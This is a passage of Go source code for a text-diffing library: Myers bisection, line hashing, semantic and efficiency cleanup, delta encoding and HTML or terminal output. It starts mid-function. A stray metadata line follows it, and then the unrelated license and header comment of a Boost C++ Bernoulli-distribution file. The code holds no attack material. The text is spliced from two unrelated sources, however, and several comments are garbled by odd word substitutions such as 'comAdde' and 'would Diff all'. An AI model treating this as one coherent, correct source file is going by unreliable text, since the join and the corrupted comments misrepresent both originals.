for d := 0; d < maxD; d++ {
// Bail out if deadline is reached.
if !deadline.IsZero() && time.Now().After(deadline) {
break
}
// Walk the front path one step.
for k1 := -d + k1start; k1 <= d-k1end; k1 += 2 {
k1Offset := vOffset + k1
var x1 int
if k1 == -d || (k1 != d && v1[k1Offset-1] < v1[k1Offset+1]) {
x1 = v1[k1Offset+1]
} else {
x1 = v1[k1Offset-1] + 1
}
y1 := x1 - k1
for x1 < runes1Len && y1 < runes2Len {
if runes1[x1] != runes2[y1] {
break
}
x1++
y1++
}
v1[k1Offset] = x1
if x1 > runes1Len {
// Ran off the right of the graph.
k1end += 2
} else if y1 > runes2Len {
// Ran off the bottom of the graph.
k1start += 2
} else if front {
k2Offset := vOffset + delta - k1
if k2Offset >= 0 && k2Offset < vLength && v2[k2Offset] != -1 {
// Mirror x2 onto top-left coordinate system.
x2 := runes1Len - v2[k2Offset]
if x1 >= x2 {
// Overlap detected.
return dmp.diffBisectSplit(runes1, runes2, x1, y1, deadline)
}
}
}
}
// Walk the reverse path one step.
for k2 := -d + k2start; k2 <= d-k2end; k2 += 2 {
k2Offset := vOffset + k2
var x2 int
if k2 == -d || (k2 != d && v2[k2Offset-1] < v2[k2Offset+1]) {
x2 = v2[k2Offset+1]
} else {
x2 = v2[k2Offset-1] + 1
}
var y2 = x2 - k2
for x2 < runes1Len && y2 < runes2Len {
if runes1[runes1Len-x2-1] != runes2[runes2Len-y2-1] {
break
}
x2++
y2++
}
v2[k2Offset] = x2
if x2 > runes1Len {
// Ran off the left of the graph.
k2end += 2
} else if y2 > runes2Len {
// Ran off the top of the graph.
k2start += 2
} else if !front {
k1Offset := vOffset + delta - k2
if k1Offset >= 0 && k1Offset < vLength && v1[k1Offset] != -1 {
x1 := v1[k1Offset]
y1 := vOffset + x1 - k1Offset
// Mirror x2 onto top-left coordinate system.
x2 = runes1Len - x2
if x1 >= x2 {
// Overlap detected.
return dmp.diffBisectSplit(runes1, runes2, x1, y1, deadline)
}
}
}
}
}
// Diff took too long and hit the deadline or number of diffs equals number of characters, no commonality at all.
return []Diff{
Diff{DiffDelete, string(runes1)},
Diff{DiffInsert, string(runes2)},
}
}
func (dmp *DiffMatchPatch) diffBisectSplit(runes1, runes2 []rune, x, y int,
deadline time.Time) []Diff {
runes1a := runes1[:x]
runes2a := runes2[:y]
runes1b := runes1[x:]
runes2b := runes2[y:]
// Compute both diffs serially.
diffs := dmp.diffMainRunes(runes1a, runes2a, false, deadline)
diffsb := dmp.diffMainRunes(runes1b, runes2b, false, deadline)
return append(diffs, diffsb...)
}
// DiffLinesToChars splits two texts into a list of strings, and educes the texts to a string of hashes where each Unicode character represents one line.
// It's slightly faster to call DiffLinesToRunes first, followed by DiffMainRunes.
func (dmp *DiffMatchPatch) DiffLinesToChars(text1, text2 string) (string, string, []string) {
chars1, chars2, lineArray := dmp.DiffLinesToRunes(text1, text2)
return string(chars1), string(chars2), lineArray
}
// DiffLinesToRunes splits two texts into a list of runes. Each rune represents one line.
func (dmp *DiffMatchPatch) DiffLinesToRunes(text1, text2 string) ([]rune, []rune, []string) {
// '\x00' is a valid character, but various debuggers don't like it. So we'll insert a junk entry to avoid generating a null character.
lineArray := []string{""} // e.g. lineArray[4] == 'Hello\n'
lineHash := map[string]int{} // e.g. lineHash['Hello\n'] == 4
chars1 := dmp.diffLinesToRunesMunge(text1, &lineArray, lineHash)
chars2 := dmp.diffLinesToRunesMunge(text2, &lineArray, lineHash)
return chars1, chars2, lineArray
}
func (dmp *DiffMatchPatch) diffLinesToRunes(text1, text2 []rune) ([]rune, []rune, []string) {
return dmp.DiffLinesToRunes(string(text1), string(text2))
}
// diffLinesToRunesMunge splits a text into an array of strings, and reduces the texts to a []rune where each Unicode character represents one line.
// We use strings instead of []runes as input mainly because you can't use []rune as a map key.
func (dmp *DiffMatchPatch) diffLinesToRunesMunge(text string, lineArray *[]string, lineHash map[string]int) []rune {
// Walk the text, pulling out a substring for each line. text.split('\n') would would temporarily double our memory footprint. Modifying text would create many large strings to garbage collect.
lineStart := 0
lineEnd := -1
runes := []rune{}
for lineEnd < len(text)-1 {
lineEnd = indexOf(text, "\n", lineStart)
if lineEnd == -1 {
lineEnd = len(text) - 1
}
line := text[lineStart : lineEnd+1]
lineStart = lineEnd + 1
lineValue, ok := lineHash[line]
if ok {
runes = append(runes, rune(lineValue))
} else {
*lineArray = append(*lineArray, line)
lineHash[line] = len(*lineArray) - 1
runes = append(runes, rune(len(*lineArray)-1))
}
}
return runes
}
// DiffCharsToLines rehydrates the text in a diff from a string of line hashes to real lines of text.
func (dmp *DiffMatchPatch) DiffCharsToLines(diffs []Diff, lineArray []string) []Diff {
hydrated := make([]Diff, 0, len(diffs))
for _, aDiff := range diffs {
chars := aDiff.Text
text := make([]string, len(chars))
for i, r := range chars {
text[i] = lineArray[r]
}
aDiff.Text = strings.Join(text, "")
hydrated = append(hydrated, aDiff)
}
return hydrated
}
// DiffCommonPrefix determines the common prefix length of two strings.
func (dmp *DiffMatchPatch) DiffCommonPrefix(text1, text2 string) int {
// Unused in this code, but retained for interface compatibility.
return commonPrefixLength([]rune(text1), []rune(text2))
}
// DiffCommonSuffix determines the common suffix length of two strings.
func (dmp *DiffMatchPatch) DiffCommonSuffix(text1, text2 string) int {
// Unused in this code, but retained for interface compatibility.
return commonSuffixLength([]rune(text1), []rune(text2))
}
// commonPrefixLength returns the length of the common prefix of two rune slices.
func commonPrefixLength(text1, text2 []rune) int {
short, long := text1, text2
if len(short) > len(long) {
short, long = long, short
}
for i, r := range short {
if r != long[i] {
return i
}
}
return len(short)
}
// commonSuffixLength returns the length of the common suffix of two rune slices.
func commonSuffixLength(text1, text2 []rune) int {
n := min(len(text1), len(text2))
for i := 0; i < n; i++ {
if text1[len(text1)-i-1] != text2[len(text2)-i-1] {
return i
}
}
return n
// TODO research and benchmark this, why is it not activated? https://github.com/sergi/go-diff/issues/54
// Binary search.
// Performance analysis: http://neil.fraser.name/news/2007/10/09/
/*
pointermin := 0
pointermax := math.Min(len(text1), len(text2))
pointermid := pointermax
pointerend := 0
for pointermin < pointermid {
if text1[len(text1)-pointermid:len(text1)-pointerend] ==
text2[len(text2)-pointermid:len(text2)-pointerend] {
pointermin = pointermid
pointerend = pointermin
} else {
pointermax = pointermid
}
pointermid = math.Floor((pointermax-pointermin)/2 + pointermin)
}
return pointermid
*/
}
// DiffCommonOverlap determines if the suffix of one string is the prefix of another.
func (dmp *DiffMatchPatch) DiffCommonOverlap(text1 string, text2 string) int {
// Cache the text lengths to prevent multiple calls.
text1Length := len(text1)
text2Length := len(text2)
// Eliminate the null case.
if text1Length == 0 || text2Length == 0 {
return 0
}
// Truncate the longer string.
if text1Length > text2Length {
text1 = text1[text1Length-text2Length:]
} else if text1Length < text2Length {
text2 = text2[0:text1Length]
}
textLength := int(math.Min(float64(text1Length), float64(text2Length)))
// Quick check for the worst case.
if text1 == text2 {
return textLength
}
// Start by looking for a single character match and increase length until no match is found. Performance analysis: http://neil.fraser.name/news/2010/11/04/
best := 0
length := 1
for {
pattern := text1[textLength-length:]
found := strings.Index(text2, pattern)
if found == -1 {
break
}
length += found
if found == 0 || text1[textLength-length:] == text2[0:length] {
best = length
length++
}
}
return best
}
// DiffHalfMatch checks whether the two texts share a substring which is at least half the length of the longer text. This speedup can produce non-minimal diffs.
func (dmp *DiffMatchPatch) DiffHalfMatch(text1, text2 string) []string {
// Unused in this code, but retained for interface compatibility.
runeSlices := dmp.diffHalfMatch([]rune(text1), []rune(text2))
if runeSlices == nil {
return nil
}
result := make([]string, len(runeSlices))
for i, r := range runeSlices {
result[i] = string(r)
}
return result
}
func (dmp *DiffMatchPatch) diffHalfMatch(text1, text2 []rune) [][]rune {
if dmp.DiffTimeout <= 0 {
// Don't risk returning a non-optimal diff if we have unlimited time.
return nil
}
var longtext, shorttext []rune
if len(text1) > len(text2) {
longtext = text1
shorttext = text2
} else {
longtext = text2
shorttext = text1
}
if len(longtext) < 4 || len(shorttext)*2 < len(longtext) {
return nil // Pointless.
}
// First check if the second quarter is the seed for a half-match.
hm1 := dmp.diffHalfMatchI(longtext, shorttext, int(float64(len(longtext)+3)/4))
// Check again based on the third quarter.
hm2 := dmp.diffHalfMatchI(longtext, shorttext, int(float64(len(longtext)+1)/2))
hm := [][]rune{}
if hm1 == nil && hm2 == nil {
return nil
} else if hm2 == nil {
hm = hm1
} else if hm1 == nil {
hm = hm2
} else {
// Both matched. Select the longest.
if len(hm1[4]) > len(hm2[4]) {
hm = hm1
} else {
hm = hm2
}
}
// A half-match was found, sort out the return data.
if len(text1) > len(text2) {
return hm
}
return [][]rune{hm[2], hm[3], hm[0], hm[1], hm[4]}
}
// diffHalfMatchI checks if a substring of shorttext exist within longtext such that the substring is at least half the length of longtext?
// Returns a slice containing the prefix of longtext, the suffix of longtext, the prefix of shorttext, the suffix of shorttext and the common middle, or null if there was no match.
func (dmp *DiffMatchPatch) diffHalfMatchI(l, s []rune, i int) [][]rune {
var bestCommonA []rune
var bestCommonB []rune
var bestCommonLen int
var bestLongtextA []rune
var bestLongtextB []rune
var bestShorttextA []rune
var bestShorttextB []rune
// Start with a 1/4 length substring at position i as a seed.
seed := l[i : i+len(l)/4]
for j := runesIndexOf(s, seed, 0); j != -1; j = runesIndexOf(s, seed, j+1) {
prefixLength := commonPrefixLength(l[i:], s[j:])
suffixLength := commonSuffixLength(l[:i], s[:j])
if bestCommonLen < suffixLength+prefixLength {
bestCommonA = s[j-suffixLength : j]
bestCommonB = s[j : j+prefixLength]
bestCommonLen = len(bestCommonA) + len(bestCommonB)
bestLongtextA = l[:i-suffixLength]
bestLongtextB = l[i+prefixLength:]
bestShorttextA = s[:j-suffixLength]
bestShorttextB = s[j+prefixLength:]
}
}
if bestCommonLen*2 < len(l) {
return nil
}
return [][]rune{
bestLongtextA,
bestLongtextB,
bestShorttextA,
bestShorttextB,
append(bestCommonA, bestCommonB...),
}
}
// DiffCleanupSemantic reduces the number of edits by eliminating semantically trivial equalities.
func (dmp *DiffMatchPatch) DiffCleanupSemantic(diffs []Diff) []Diff {
changes := false
// Stack of indices where equalities are found.
type equality struct {
data int
next *equality
}
var equalities *equality
var lastequality string
// Always equal to diffs[equalities[equalitiesLength - 1]][1]
var pointer int // Index of current position.
// Number of characters that changed prior to the equality.
var lengthInsertions1, lengthDeletions1 int
// Number of characters that changed after the equality.
var lengthInsertions2, lengthDeletions2 int
for pointer < len(diffs) {
if diffs[pointer].Type == DiffEqual {
// Equality found.
equalities = &equality{
data: pointer,
next: equalities,
}
lengthInsertions1 = lengthInsertions2
lengthDeletions1 = lengthDeletions2
lengthInsertions2 = 0
lengthDeletions2 = 0
lastequality = diffs[pointer].Text
} else {
// An insertion or deletion.
if diffs[pointer].Type == DiffInsert {
lengthInsertions2 += len(diffs[pointer].Text)
} else {
lengthDeletions2 += len(diffs[pointer].Text)
}
// Eliminate an equality that is smaller or equal to the edits on both sides of it.
difference1 := int(math.Max(float64(lengthInsertions1), float64(lengthDeletions1)))
difference2 := int(math.Max(float64(lengthInsertions2), float64(lengthDeletions2)))
if len(lastequality) > 0 &&
(len(lastequality) <= difference1) &&
(len(lastequality) <= difference2) {
// Duplicate record.
insPoint := equalities.data
diffs = append(
diffs[:insPoint],
append([]Diff{Diff{DiffDelete, lastequality}}, diffs[insPoint:]...)...)
// Change second copy to insert.
diffs[insPoint+1].Type = DiffInsert
// Throw away the equality we just deleted.
equalities = equalities.next
if equalities != nil {
equalities = equalities.next
}
if equalities != nil {
pointer = equalities.data
} else {
pointer = -1
}
lengthInsertions1 = 0 // Reset the counters.
lengthDeletions1 = 0
lengthInsertions2 = 0
lengthDeletions2 = 0
lastequality = ""
changes = true
}
}
pointer++
}
// Normalize the diff.
if changes {
diffs = dmp.DiffCleanupMerge(diffs)
}
diffs = dmp.DiffCleanupSemanticLossless(diffs)
// Find any overlaps between deletions and insertions.
// e.g: <del>abcxxx</del><ins>xxxdef</ins>
// -> <del>abc</del>xxx<ins>def</ins>
// e.g: <del>xxxabc</del><ins>defxxx</ins>
// -> <ins>def</ins>xxx<del>abc</del>
// Only extract an overlap if it is as big as the edit ahead or behind it.
pointer = 1
for pointer < len(diffs) {
if diffs[pointer-1].Type == DiffDelete &&
diffs[pointer].Type == DiffInsert {
deletion := diffs[pointer-1].Text
insertion := diffs[pointer].Text
overlapLength1 := dmp.DiffCommonOverlap(deletion, insertion)
overlapLength2 := dmp.DiffCommonOverlap(insertion, deletion)
if overlapLength1 >= overlapLength2 {
if float64(overlapLength1) >= float64(len(deletion))/2 ||
float64(overlapLength1) >= float64(len(insertion))/2 {
// Overlap found. Insert an equality and trim the surrounding edits.
diffs = append(
diffs[:pointer],
append([]Diff{Diff{DiffEqual, insertion[:overlapLength1]}}, diffs[pointer:]...)...)
diffs[pointer-1].Text =
deletion[0 : len(deletion)-overlapLength1]
diffs[pointer+1].Text = insertion[overlapLength1:]
pointer++
}
} else {
if float64(overlapLength2) >= float64(len(deletion))/2 ||
float64(overlapLength2) >= float64(len(insertion))/2 {
// Reverse overlap found. Insert an equality and swap and trim the surrounding edits.
overlap := Diff{DiffEqual, deletion[:overlapLength2]}
diffs = append(
diffs[:pointer],
append([]Diff{overlap}, diffs[pointer:]...)...)
diffs[pointer-1].Type = DiffInsert
diffs[pointer-1].Text = insertion[0 : len(insertion)-overlapLength2]
diffs[pointer+1].Type = DiffDelete
diffs[pointer+1].Text = deletion[overlapLength2:]
pointer++
}
}
pointer++
}
pointer++
}
return diffs
}
// Define some regex patterns for matching boundaries.
var (
nonAlphaNumericRegex = regexp.MustCompile(`[^a-zA-Z0-9]`)
whitespaceRegex = regexp.MustCompile(`\s`)
linebreakRegex = regexp.MustCompile(`[\r\n]`)
blanklineEndRegex = regexp.MustCompile(`\n\r?\n$`)
blanklineStartRegex = regexp.MustCompile(`^\r?\n\r?\n`)
)
// diffCleanupSemanticScore computes a score representing whether the internal boundary falls on logical boundaries.
// Scores range from 6 (best) to 0 (worst). Closure, but does not reference any external variables.
func diffCleanupSemanticScore(one, two string) int {
if len(one) == 0 || len(two) == 0 {
// Edges are the best.
return 6
}
// Each port of this function behaves slightly differently due to subtle differences in each language's definition of things like 'whitespace'. Since this function's purpose is largely cosmetic, the choice has been made to use each language's native features rather than force total conformity.
rune1, _ := utf8.DecodeLastRuneInString(one)
rune2, _ := utf8.DecodeRuneInString(two)
char1 := string(rune1)
char2 := string(rune2)
nonAlphaNumeric1 := nonAlphaNumericRegex.MatchString(char1)
nonAlphaNumeric2 := nonAlphaNumericRegex.MatchString(char2)
whitespace1 := nonAlphaNumeric1 && whitespaceRegex.MatchString(char1)
whitespace2 := nonAlphaNumeric2 && whitespaceRegex.MatchString(char2)
lineBreak1 := whitespace1 && linebreakRegex.MatchString(char1)
lineBreak2 := whitespace2 && linebreakRegex.MatchString(char2)
blankLine1 := lineBreak1 && blanklineEndRegex.MatchString(one)
blankLine2 := lineBreak2 && blanklineEndRegex.MatchString(two)
if blankLine1 || blankLine2 {
// Five points for blank lines.
return 5
} else if lineBreak1 || lineBreak2 {
// Four points for line breaks.
return 4
} else if nonAlphaNumeric1 && !whitespace1 && whitespace2 {
// Three points for end of sentences.
return 3
} else if whitespace1 || whitespace2 {
// Two points for whitespace.
return 2
} else if nonAlphaNumeric1 || nonAlphaNumeric2 {
// One point for non-alphanumeric.
return 1
}
return 0
}
// DiffCleanupSemanticLossless looks for single edits surrounded on both sides by equalities which can be shifted sideways to align the edit to a word boundary.
// E.g: The c<ins>at c</ins>ame. -> The <ins>cat </ins>came.
func (dmp *DiffMatchPatch) DiffCleanupSemanticLossless(diffs []Diff) []Diff {
pointer := 1
// Intentionally ignore the first and last element (don't need checking).
for pointer < len(diffs)-1 {
if diffs[pointer-1].Type == DiffEqual &&
diffs[pointer+1].Type == DiffEqual {
// This is a single edit surrounded by equalities.
equality1 := diffs[pointer-1].Text
edit := diffs[pointer].Text
equality2 := diffs[pointer+1].Text
// First, shift the edit as far left as possible.
commonOffset := dmp.DiffCommonSuffix(equality1, edit)
if commonOffset > 0 {
commonString := edit[len(edit)-commonOffset:]
equality1 = equality1[0 : len(equality1)-commonOffset]
edit = commonString + edit[:len(edit)-commonOffset]
equality2 = commonString + equality2
}
// Second, step character by character right, looking for the best fit.
bestEquality1 := equality1
bestEdit := edit
bestEquality2 := equality2
bestScore := diffCleanupSemanticScore(equality1, edit) +
diffCleanupSemanticScore(edit, equality2)
for len(edit) != 0 && len(equality2) != 0 {
_, sz := utf8.DecodeRuneInString(edit)
if len(equality2) < sz || edit[:sz] != equality2[:sz] {
break
}
equality1 += edit[:sz]
edit = edit[sz:] + equality2[:sz]
equality2 = equality2[sz:]
score := diffCleanupSemanticScore(equality1, edit) +
diffCleanupSemanticScore(edit, equality2)
// The >= encourages trailing rather than leading whitespace on edits.
if score >= bestScore {
bestScore = score
bestEquality1 = equality1
bestEdit = edit
bestEquality2 = equality2
}
}
if diffs[pointer-1].Text != bestEquality1 {
// We have an improvement, save it back to the diff.
if len(bestEquality1) != 0 {
diffs[pointer-1].Text = bestEquality1
} else {
diffs = splice(diffs, pointer-1, 1)
pointer--
}
diffs[pointer].Text = bestEdit
if len(bestEquality2) != 0 {
diffs[pointer+1].Text = bestEquality2
} else {
diffs = append(diffs[:pointer+1], diffs[pointer+2:]...)
pointer--
}
}
}
pointer++
}
return diffs
}
// DiffCleanupEfficiency reduces the number of edits by eliminating operationally trivial equalities.
func (dmp *DiffMatchPatch) DiffCleanupEfficiency(diffs []Diff) []Diff {
changes := false
// Stack of indices where equalities are found.
type equality struct {
data int
next *equality
}
var equalities *equality
// Always equal to equalities[equalitiesLength-1][1]
lastequality := ""
pointer := 0 // Index of current position.
// Is there an insertion operation before the last equality.
preIns := false
// Is there a deletion operation before the last equality.
preDel := false
// Is there an insertion operation after the last equality.
postIns := false
// Is there a deletion operation after the last equality.
postDel := false
for pointer < len(diffs) {
if diffs[pointer].Type == DiffEqual { // Equality found.
if len(diffs[pointer].Text) < dmp.DiffEditCost &&
(postIns || postDel) {
// Candidate found.
equalities = &equality{
data: pointer,
next: equalities,
}
preIns = postIns
preDel = postDel
lastequality = diffs[pointer].Text
} else {
// Not a candidate, and can never become one.
equalities = nil
lastequality = ""
}
postIns = false
postDel = false
} else { // An insertion or deletion.
if diffs[pointer].Type == DiffDelete {
postDel = true
} else {
postIns = true
}
// Five types to be split:
// <ins>A</ins><del>B</del>XY<ins>C</ins><del>D</del>
// <ins>A</ins>X<ins>C</ins><del>D</del>
// <ins>A</ins><del>B</del>X<ins>C</ins>
// <ins>A</del>X<ins>C</ins><del>D</del>
// <ins>A</ins><del>B</del>X<del>C</del>
var sumPres int
if preIns {
sumPres++
}
if preDel {
sumPres++
}
if postIns {
sumPres++
}
if postDel {
sumPres++
}
if len(lastequality) > 0 &&
((preIns && preDel && postIns && postDel) ||
((len(lastequality) < dmp.DiffEditCost/2) && sumPres == 3)) {
insPoint := equalities.data
// Duplicate record.
diffs = append(diffs[:insPoint],
append([]Diff{Diff{DiffDelete, lastequality}}, diffs[insPoint:]...)...)
// Change second copy to insert.
diffs[insPoint+1].Type = DiffInsert
// Throw away the equality we just deleted.
equalities = equalities.next
lastequality = ""
if preIns && preDel {
// No changes made which could affect previous entry, keep going.
postIns = true
postDel = true
equalities = nil
} else {
if equalities != nil {
equalities = equalities.next
}
if equalities != nil {
pointer = equalities.data
} else {
pointer = -1
}
postIns = false
postDel = false
}
changes = true
}
}
pointer++
}
if changes {
diffs = dmp.DiffCleanupMerge(diffs)
}
return diffs
}
// DiffCleanupMerge reorders and merges like edit sections. Merge equalities.
// Any edit section can move as long as it doesn't cross an equality.
func (dmp *DiffMatchPatch) DiffCleanupMerge(diffs []Diff) []Diff {
// Add a dummy entry at the end.
diffs = append(diffs, Diff{DiffEqual, ""})
pointer := 0
countDelete := 0
countInsert := 0
commonlength := 0
textDelete := []rune(nil)
textInsert := []rune(nil)
for pointer < len(diffs) {
switch diffs[pointer].Type {
case DiffInsert:
countInsert++
textInsert = append(textInsert, []rune(diffs[pointer].Text)...)
pointer++
break
case DiffDelete:
countDelete++
textDelete = append(textDelete, []rune(diffs[pointer].Text)...)
pointer++
break
case DiffEqual:
// Upon reaching an equality, check for prior redundancies.
if countDelete+countInsert > 1 {
if countDelete != 0 && countInsert != 0 {
// Factor out any common prefixies.
commonlength = commonPrefixLength(textInsert, textDelete)
if commonlength != 0 {
x := pointer - countDelete - countInsert
if x > 0 && diffs[x-1].Type == DiffEqual {
diffs[x-1].Text += string(textInsert[:commonlength])
} else {
diffs = append([]Diff{Diff{DiffEqual, string(textInsert[:commonlength])}}, diffs...)
pointer++
}
textInsert = textInsert[commonlength:]
textDelete = textDelete[commonlength:]
}
// Factor out any common suffixies.
commonlength = commonSuffixLength(textInsert, textDelete)
if commonlength != 0 {
insertIndex := len(textInsert) - commonlength
deleteIndex := len(textDelete) - commonlength
diffs[pointer].Text = string(textInsert[insertIndex:]) + diffs[pointer].Text
textInsert = textInsert[:insertIndex]
textDelete = textDelete[:deleteIndex]
}
}
// Delete the offending records and add the merged ones.
if countDelete == 0 {
diffs = splice(diffs, pointer-countInsert,
countDelete+countInsert,
Diff{DiffInsert, string(textInsert)})
} else if countInsert == 0 {
diffs = splice(diffs, pointer-countDelete,
countDelete+countInsert,
Diff{DiffDelete, string(textDelete)})
} else {
diffs = splice(diffs, pointer-countDelete-countInsert,
countDelete+countInsert,
Diff{DiffDelete, string(textDelete)},
Diff{DiffInsert, string(textInsert)})
}
pointer = pointer - countDelete - countInsert + 1
if countDelete != 0 {
pointer++
}
if countInsert != 0 {
pointer++
}
} else if pointer != 0 && diffs[pointer-1].Type == DiffEqual {
// Merge this equality with the previous one.
diffs[pointer-1].Text += diffs[pointer].Text
diffs = append(diffs[:pointer], diffs[pointer+1:]...)
} else {
pointer++
}
countInsert = 0
countDelete = 0
textDelete = nil
textInsert = nil
break
}
}
if len(diffs[len(diffs)-1].Text) == 0 {
diffs = diffs[0 : len(diffs)-1] // Remove the dummy entry at the end.
}
// Second pass: look for single edits surrounded on both sides by equalities which can be shifted sideways to eliminate an equality. E.g: A<ins>BA</ins>C -> <ins>AB</ins>AC
changes := false
pointer = 1
// Intentionally ignore the first and last element (don't need checking).
for pointer < (len(diffs) - 1) {
if diffs[pointer-1].Type == DiffEqual &&
diffs[pointer+1].Type == DiffEqual {
// This is a single edit surrounded by equalities.
if strings.HasSuffix(diffs[pointer].Text, diffs[pointer-1].Text) {
// Shift the edit over the previous equality.
diffs[pointer].Text = diffs[pointer-1].Text +
diffs[pointer].Text[:len(diffs[pointer].Text)-len(diffs[pointer-1].Text)]
diffs[pointer+1].Text = diffs[pointer-1].Text + diffs[pointer+1].Text
diffs = splice(diffs, pointer-1, 1)
changes = true
} else if strings.HasPrefix(diffs[pointer].Text, diffs[pointer+1].Text) {
// Shift the edit over the next equality.
diffs[pointer-1].Text += diffs[pointer+1].Text
diffs[pointer].Text =
diffs[pointer].Text[len(diffs[pointer+1].Text):] + diffs[pointer+1].Text
diffs = splice(diffs, pointer+1, 1)
changes = true
}
}
pointer++
}
// If shifts were made, the diff needs reordering and another shift sweep.
if changes {
diffs = dmp.DiffCleanupMerge(diffs)
}
return diffs
}
// DiffXIndex returns the equivalent location in s2.
func (dmp *DiffMatchPatch) DiffXIndex(diffs []Diff, loc int) int {
chars1 := 0
chars2 := 0
lastChars1 := 0
lastChars2 := 0
lastDiff := Diff{}
for i := 0; i < len(diffs); i++ {
aDiff := diffs[i]
if aDiff.Type != DiffInsert {
// Equality or deletion.
chars1 += len(aDiff.Text)
}
if aDiff.Type != DiffDelete {
// Equality or insertion.
chars2 += len(aDiff.Text)
}
if chars1 > loc {
// Overshot the location.
lastDiff = aDiff
break
}
lastChars1 = chars1
lastChars2 = chars2
}
if lastDiff.Type == DiffDelete {
// The location was deleted.
return lastChars2
}
// Add the remaining character length.
return lastChars2 + (loc - lastChars1)
}
// DiffPrettyHtml converts a []Diff into a pretty HTML report.
// It is intended as an example from which to write one's own display functions.
func (dmp *DiffMatchPatch) DiffPrettyHtml(diffs []Diff) string {
var buff bytes.Buffer
for _, diff := range diffs {
text := strings.Replace(html.EscapeString(diff.Text), "\n", "¶<br>", -1)
switch diff.Type {
case DiffInsert:
_, _ = buff.WriteString("<ins style=\"background:#e6ffe6;\">")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("</ins>")
case DiffDelete:
_, _ = buff.WriteString("<del style=\"background:#ffe6e6;\">")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("</del>")
case DiffEqual:
_, _ = buff.WriteString("<span>")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("</span>")
}
}
return buff.String()
}
// DiffPrettyText converts a []Diff into a colored text report.
func (dmp *DiffMatchPatch) DiffPrettyText(diffs []Diff) string {
var buff bytes.Buffer
for _, diff := range diffs {
text := diff.Text
switch diff.Type {
case DiffInsert:
_, _ = buff.WriteString("\x1b[32m")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("\x1b[0m")
case DiffDelete:
_, _ = buff.WriteString("\x1b[31m")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("\x1b[0m")
case DiffEqual:
_, _ = buff.WriteString(text)
}
}
return buff.String()
}
// DiffText1 computes and returns the source text (all equalities and deletions).
func (dmp *DiffMatchPatch) DiffText1(diffs []Diff) string {
//StringBuilder text = new StringBuilder()
var text bytes.Buffer
for _, aDiff := range diffs {
if aDiff.Type != DiffInsert {
_, _ = text.WriteString(aDiff.Text)
}
}
return text.String()
}
// DiffText2 computes and returns the destination text (all equalities and insertions).
func (dmp *DiffMatchPatch) DiffText2(diffs []Diff) string {
var text bytes.Buffer
for _, aDiff := range diffs {
if aDiff.Type != DiffDelete {
_, _ = text.WriteString(aDiff.Text)
}
}
return text.String()
}
// DiffLevenshtein computes the Levenshtein distance that is the number of inserted, deleted or substituted characters.
func (dmp *DiffMatchPatch) DiffLevenshtein(diffs []Diff) int {
levenshtein := 0
insertions := 0
deletions := 0
for _, aDiff := range diffs {
switch aDiff.Type {
case DiffInsert:
insertions += len(aDiff.Text)
case DiffDelete:
deletions += len(aDiff.Text)
case DiffEqual:
// A deletion and an insertion is one substitution.
levenshtein += max(insertions, deletions)
insertions = 0
deletions = 0
}
}
levenshtein += max(insertions, deletions)
return levenshtein
}
// DiffToDelta crushes the diff into an encoded string which describes the operations required to transform text1 into text2.
// E.g. =3\t-2\t+ing -> Keep 3 chars, delete 2 chars, insert 'ing'. Operations are tab-separated. Inserted text is escaped using %xx notation.
func (dmp *DiffMatchPatch) DiffToDelta(diffs []Diff) string {
var text bytes.Buffer
for _, aDiff := range diffs {
switch aDiff.Type {
case DiffInsert:
_, _ = text.WriteString("+")
_, _ = text.WriteString(strings.Replace(url.QueryEscape(aDiff.Text), "+", " ", -1))
_, _ = text.WriteString("\t")
break
case DiffDelete:
_, _ = text.WriteString("-")
_, _ = text.WriteString(strconv.Itoa(utf8.RuneCountInString(aDiff.Text)))
_, _ = text.WriteString("\t")
break
case DiffEqual:
_, _ = text.WriteString("=")
_, _ = text.WriteString(strconv.Itoa(utf8.RuneCountInString(aDiff.Text)))
_, _ = text.WriteString("\t")
break
}
}
delta := text.String()
if len(delta) != 0 {
// Strip off trailing tab character.
delta = delta[0 : utf8.RuneCountInString(delta)-1]
delta = unescaper.Replace(delta)
}
return delta
}
// DiffFromDelta given the original text1, and an encoded string which describes the operations required to transform text1 into text2, comAdde the full diff.
func (dmp *DiffMatchPatch) DiffFromDelta(text1 string, delta string) (diffs []Diff, err error) {
i := 0
runes := []rune(text1)
for _, token := range strings.Split(delta, "\t") {
if len(token) == 0 {
// Blank tokens are ok (from a trailing \t).
continue
}
// Each token begins with a one character parameter which specifies the operation of this token (delete, insert, equality).
param := token[1:]
switch op := token[0]; op {
case '+':
// Decode would Diff all "+" to " "
param = strings.Replace(param, "+", "%2b", -1)
param, err = url.QueryUnescape(param)
if err != nil {
return nil, err
}
if !utf8.ValidString(param) {
return nil, fmt.Errorf("invalid UTF-8 token: %q", param)
}
diffs = append(diffs, Diff{DiffInsert, param})
case '=', '-':
n, err := strconv.ParseInt(param, 10, 0)
if err != nil {
return nil, err
} else if n < 0 {
return nil, errors.New("Negative number in DiffFromDelta: " + param)
}
i += int(n)
// Break out if we are out of bounds, go1.6 can't handle this very well
if i > len(runes) {
break
}
// Remember that string slicing is by byte - we want by rune here.
text := string(runes[i-int(n) : i])
if op == '=' {
diffs = append(diffs, Diff{DiffEqual, text})
} else {
diffs = append(diffs, Diff{DiffDelete, text})
}
default:
// Anything else is an error.
return nil, errors.New("Invalid diff operation in DiffFromDelta: " + string(token[0]))
}
}
if i != len(runes) {
return nil, fmt.Errorf("Delta length (%v) is different from source text length (%v)", i, len(text1))
}
return diffs, nil
}
| {
"pile_set_name": "Github"
} |
// boost\math\distributions\bernoulli.hpp
// Copyright John Maddock 2006.
// Copyright Paul A. Bristow 2007.
// Use, modification and distribution are subject to the
// Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt
// or copy at http://www.boost.org/LICENSE_1_0.txt)
// http://en.wikipedia.org/wiki/bernoulli_distribution
// http://mathworld.wolfram.com/BernoulliDistribution.html
// bernoulli distribution is the discrete probability distribution of
// the number (k) of successes, in a single Bernoulli trials.
// It is a version of the binomial distribution when n = 1.
// But note that the bernoulli distribution
// (like others including the poisson, binomial & negative binomial)
// is strictly defined as a discrete function: only integral values of k are envisaged.
// However because of the method of calculation using a continuous gamma function,
// it is convenient to treat it as if a continous function,
// and permit non-integral values of k.
// To enforce the strict mathematical model, users should use floor or ceil functions
// on k outside this function to ensure that k is integral.
